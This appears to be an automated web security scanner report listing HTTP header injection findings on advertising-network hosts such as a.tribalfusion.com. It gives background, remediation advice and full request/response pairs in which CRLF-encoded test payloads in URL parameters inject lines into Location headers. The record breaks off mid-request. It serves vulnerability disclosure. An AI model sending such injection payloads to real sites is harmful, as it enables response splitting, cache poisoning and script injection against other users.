http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 3]
http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 4]
http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [ord parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [a parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcc parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcp parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [vehicle parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [ord parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 4]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 5]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [a parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcc parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcp parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [vehicle parameter]
http://ad.afy11.net/ad [c parameter]
http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://media.fastclick.net/w/click.here [c parameter]
http://media.fastclick.net/w/click.here [cid parameter]
http://media.fastclick.net/w/click.here [i parameter]
http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 2]
http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 4]
http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 5]
http://xads.zedo.com/ads2/c [a parameter]
http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload 8821f%0d%0a998b2e99413 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=8821f%0d%0a998b2e99413 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a5nEV8sjyDtPTFMlFYNZdZaoWpfmPd3NG6PavZc0Zd5wLKPMfkZdtjgTqbQwcqUsPeA7t0YeymfxU8CtwZcdtPT0ObEUq9NvkEwSZcJZcnMSk60wQIduNAxSJZcAlgQgBpslZdhYqZbAvHX3kDusL4V7Gq66PAZdqfclUS10Cfps8EKxkePBMZb1tFFuNmsZdImHnWGB1ZdrGtc1kmR5Vdp77qaOZdYCtMqZanCjWqpY3cURytTFZdKTfyxYJW5DSRcTglhw9UlK6lMcIrxEJX5FykTykZbU1ZdxMMyZaStRa1msRJ4YIwZbZdGmsqPZcrY9552WZc1nSyrqYcobGxGLJZdQmbFcvDQBa5whq7RCcXhZdxoBgZcqvMBoutyPXMHrFrrTcYV6Xx9VZbpKAPJtpxy3Y4O16vA6Nc5S8JERX9Ol9Fp4C7QvkWwOSYBMqJLGXWZcEsAORlZcyS2oy1nVuiZdEU3pF36uXukZbxZb9yFbY1RTogGRlM2ZcV7dW2isBgU1Zd0vY8ZaWDXZdE8a0MpToBbi1LueSOXNOpGlw9J84WaV9KG6wOgtZcnkxYfJZbeVji6b1BtcMDxWnHyeq8TtMfRgMb0O; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:56 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=8821f
998b2e99413
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload 81a35%0d%0a3ed9f4f3faf was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/81a35%0d%0a3ed9f4f3faf/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a4nEV8SZdIitpTnM2YiNjBNqCY9XdYnGReM4xg65h1bX57lBTjxQdMx2RikpSyyibgCZaZarRTDZcPU30asDTEuFrh0E1ZbAQ4ZcJvKBmS81W0U1EyCip7JZdD5cZd6aZc0eO9npOEhHxJ4LY4nXDyZawQAfZdZa2ri0YRrjxNx8tMKLGX1PJBq6PmUvfSEfZaGMTcCUyQHORg7tPSGdS38Osg6NDLOoZbZbSbHmKU58p2jkOd2Vmd5LlCUC6SrxgD38pZbr9ZaijFLLoCMaONOYZa6SkkUlZdI7Iyk4xnUh9NRZbQYwCTepAYqB40QBW4RqZcKqAaOxlpLAaIcQ2ijnk7f1OfSuEZdcs2WUuTn6j7cb21QgtJLuZanSW5qgbZbl0vri1WZadjDV1vhHdth0tcDqT3HmjDLLnaoTpZdPHpUvwmNA6mZbSXT9IcVjI4roPH10TvVGy0PZacYcqix5fgXr0cLV1ZbrIACS2uGsdZdhZaPjk5ZdVFHGXcSZbMd3oZd9SWJv6p1poDewGj5pqCD9wMSbVa2ZcV5air04sZaprjyrVNdF8ZayuMPQXuAPMnrgMUhAb3CaTFGaamnBabDcOtRJl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:36 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/81a35
3ed9f4f3faf/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload df046%0d%0ab61ace5dcb9 was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/df046%0d%0ab61ace5dcb9/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
